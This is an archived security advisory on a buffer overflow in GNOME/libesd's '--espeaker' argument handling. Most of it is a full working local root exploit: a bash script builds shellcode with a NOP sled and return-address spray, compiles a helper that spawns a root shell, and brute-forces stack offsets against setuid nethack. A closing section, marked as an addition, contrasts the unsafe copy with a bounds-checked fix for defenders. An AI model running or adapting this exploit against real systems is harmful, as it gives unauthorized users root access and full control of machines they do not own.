source: http://www.securityfocus.com/bid/663/info
A buffer overflow vulnerability in the GNOME shared libraries' handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access.
Calling a program linked against GNOME with command line arguments such as '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow.
One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'.
It is likely that this is a vulnerability in the libesd shared library rather than in libgnome; in that case esound 0.2.8 would be vulnerable.
#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our settings
# just so. Hence the shell script.
#
# This should work against any su/gid GNOME program. The only one that comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to exploit
# a different program.
#
# -Brock Tellier [email protected]

echo "Building /tmp/gnox.c..."
cat > /tmp/gnox.c <<'EOF'
/*
 * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
 * Will work against any program using the GNOME libraries in the form
 * Keep your BUFSIZ at 90 and only modify your offset
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */

/* Generic Linux x86 shellcode modified to run our program (/tmp/gn) */
char gnoshell[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/tmp/gn";

#define LEN 120
#define BUFLEN 90 /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300

/* Returns the current stack pointer (i386 only: the value is left in %eax) */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[]) {
    int offset, i;
    int buflen = BUFLEN;
    long int addr;
    char buf[BUFLEN];
    char gnobuf[LEN];

    if (argc > 2) {
        fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
        exit(0);
    } else if (argc == 2) {
        offset = atoi(argv[1]);
    } else {
        offset = DEFAULT_OFFSET;
    }

    addr = get_sp();
    fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
    fprintf(stderr, "Brock Tellier [email protected]\n\n");
    fprintf(stderr, "Using addr: 0x%lx buflen:%d offset:%d\n", addr - offset,
            buflen, offset);

    /* NOP sled, then the shellcode at offset 35, then the guessed return
     * address repeated up to the end of the buffer */
    memset(buf, NOP, buflen);
    memcpy(buf + 35, gnoshell, strlen(gnoshell));
    for (i = 35 + strlen(gnoshell); i < buflen - 4; i += 4)
        *(int *)&buf[i] = addr - offset;

    /* Emit the two arguments that trigger the overflow */
    sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
    for (i = 0; i < strlen(gnobuf); i++)
        putchar(gnobuf[i]);
    return 0;
}
EOF
echo "...done!"

echo "Building /tmp/gn.c..."
cat > /tmp/gn.c <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Run by the shellcode: make the effective ids real, then spawn a shell */
int main(void) {
    printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
           geteuid(), getgid(), getegid());
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());
    printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
           geteuid(), getgid(), getegid());
    system("/bin/bash");
    return 0;
}
EOF
echo "...done!"

echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"
echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"

echo "Launching attack..."
# Step the offset until the guessed return address lands in the NOP sled
offset=0
while [ $offset -lt 10000 ]; do
    /usr/games/nethack `/tmp/gnox $offset`
    offset=`expr $offset + 4`
done
echo "...done!"
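As an added, defender-side illustration (not part of the advisory or of the exploit script above), here is the fixed-buffer copy pattern the advisory describes next to a bounds-checked replacement that rejects oversize --espeaker values. The function names are hypothetical and the unsafe form is a reconstruction, since the advisory does not show the libesd or libgnome source.

```c
#include <stdio.h>
#include <string.h>

#define ESPEAKER_MAX 80   /* size of the fixed buffer the advisory describes */

/* Hypothetical reconstruction of the vulnerable pattern (the advisory does not
 * show the library source): the option value is copied into a fixed 80-byte
 * buffer with no length check, so a value of 80 or more bytes overruns it. */
void espeaker_set_unsafe(const char *value, char dest[ESPEAKER_MAX]) {
    strcpy(dest, value);   /* unbounded copy: the root cause of the overflow */
}

/* Hardened version: the value must fit in dest including the terminator.
 * Returns 0 and fills dest on success; returns -1 and leaves dest untouched
 * if the value is not NUL-terminated within destlen bytes (i.e. too long). */
int espeaker_set_safe(const char *value, char *dest, size_t destlen) {
    const char *end;
    size_t n;
    if (value == NULL || dest == NULL || destlen == 0)
        return -1;
    end = memchr(value, '\0', destlen);   /* never reads past destlen bytes */
    if (end == NULL)
        return -1;                        /* strlen(value) >= destlen: reject */
    n = (size_t)(end - value);
    memcpy(dest, value, n);
    dest[n] = '\0';
    return 0;
}

/* Handle one argv entry of the form "--espeaker=<host:port>".
 * Returns 1 if recognised and accepted, 0 if it is not an --espeaker option,
 * -1 if it is an --espeaker option whose value was rejected. */
int handle_espeaker_arg(const char *arg, char *dest, size_t destlen) {
    static const char prefix[] = "--espeaker=";
    size_t plen = sizeof prefix - 1;
    if (strncmp(arg, prefix, plen) != 0)
        return 0;
    return espeaker_set_safe(arg + plen, dest, destlen) == 0 ? 1 : -1;
}

int main(int argc, char *argv[]) {
    char dest[ESPEAKER_MAX] = "";
    for (int i = 1; i < argc; i++)   /* e.g. ./a.out --enable-sound --espeaker=host:16001 */
        if (handle_espeaker_arg(argv[i], dest, sizeof dest) == -1)
            fprintf(stderr, "argv[%d]: --espeaker value too long, ignored\n", i);
    printf("espeaker=\"%s\"\n", dest);
    return 0;
}
```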